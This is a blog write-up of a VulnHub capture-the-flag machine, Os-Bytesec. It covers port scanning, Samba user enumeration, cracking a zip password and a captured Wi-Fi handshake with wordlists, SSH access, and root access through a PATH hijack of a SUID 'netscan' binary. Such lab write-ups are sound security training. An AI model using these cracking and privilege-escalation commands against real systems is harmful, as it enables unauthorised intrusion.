Open in app

Sign in

Write

Sign in

[VULNHUB] Os-Bytesec

Zaidan Rizaki
4 min readJan 1, 2020

--

For Indonesian version of this write-up, click here.

Setup

I run the VM using Virtualbox with bridged adapter. Some machine may require a specific hostname in /etc/hosts . Otherwise, you can add the machine’s IP address into /etc/hosts to make things more easier and simpler. Here I used bytesec.vh as the machine’s hostname.

Information Gathering

NMAP

nmap -sV -sC -p- bytesec.vh -oN initial.nmap -v

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 5ECF6AFD7D00CCBE6B3C7AA8FD31BDE8
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
|   256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_  256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
MAC Address: 08:00:27:B3:78:46 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The server runs HTTP at port 80, SMB at 139 and 445, and SSH at 2525.

GOBUSTER

gobuster dir -u http://bytesec.vh -w /usr/share/wordlists/dirb/big.txt

/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/gallery (Status: 301)
/html (Status: 301)
/img (Status: 301)
/js (Status: 301)
/news (Status: 301)
/server-status (Status: 403)

No really interesting stuff. But I found this image in /img .

Does this machine has BlueKeep vulnerability? 😕

BlueKeep is a remote code execution vulnerability exists in Remote Desktop Services — formerly known as Terminal Services — when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (microsoft)

ENUM4LINUX

Enum4linux is a tool for enumerating information from Windows and Samba systems. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, netlookup, and nmblookup.

We use enum4linux to gather information like domain, OS running inside, SMB version, even the user inside a domain.

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)

SMBCLIENT

From the result of enum4linux above, we got 3 user, after trying to login with each username, user smb is the only one able to log in.

smbclient //bytesec.vh/smb -U smb -p

Download the save.zip .

FCRACKZIP

It turns out that the save.zip is locked with a password, we can try to bruteforce it using fcrackzip.

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

And we got our password cracked.

PASSWORD FOUND!!!!: pw == hacker1smb:

The content of save.zip is one image named secret.jpg that contains no “secret”, and a packet capture file named user.cap.

user.cap

After examining the user.cap for a while, there are lots of deauth packet. We can assume that this is a packet capture file from someone trying to capture three-way handshake between a wifi client and access point (using airodump/ aireplay). We can use aircrack to crack the captured three-way handshake.

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

snowflake is the wifi password.

Exploitation

User Flag

We can ssh to the port 2525, using the user.cap ESSID (blackjax) and the cracked password (snowflake).

Root Flag

Next we can do system enumeration using linenum.sh. Make sure to run the script in rwx directory such as /tmp .

[-] SUID files:
.
.
-rwsr-xr-x 1 root root 7432 Nov  4 20:00 /usr/bin/netscan

One particular point that pretty interesting is there is files (or script?) named netscan which has SUID/SETUID flag. SUID/SETUID flag means we can run the associated file with root permission without providing any password. Also the netscan file is a file that usually do not exist in other normal systems.

Netscan

It turns out that the netscan is actually a “script” to run netstat created by someone to just output the established connection. With that logic in mind we can trick the system by “changing” the netstat file.

Privilege Escalation

  1. Create a file named netstat in /tmp.

echo "/bin/sh" > netstat

2. Add the /tmp directory into $PATH .

export PATH=/tmp:$PATH

3. Run netscan .

And we get the root 😃

So how does it works?

So basically we manipulate the flow of netscan script. The script is supposed to call real netstat which is a tool to show all active connections, but because we overwrite the environment variable ($PATH), the script calls the fake netstat in /tmp instead.

Actually overwriting the $PATH is not enough to gain privilege escalation. But because netscan has a SUID flag, the netscan invoke the root shell instead.

That's for today, hope you guys like it *Dave Lee voice* 👋

Hacking
Infosec
Vulnhub
Writeup
Ctf

--

--

Zaidan Rizaki
Zaidan Rizaki

Written by Zaidan Rizaki

3 Followers
4 Following

Ordinary high school kid who has big interest in networking and information security stuff.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams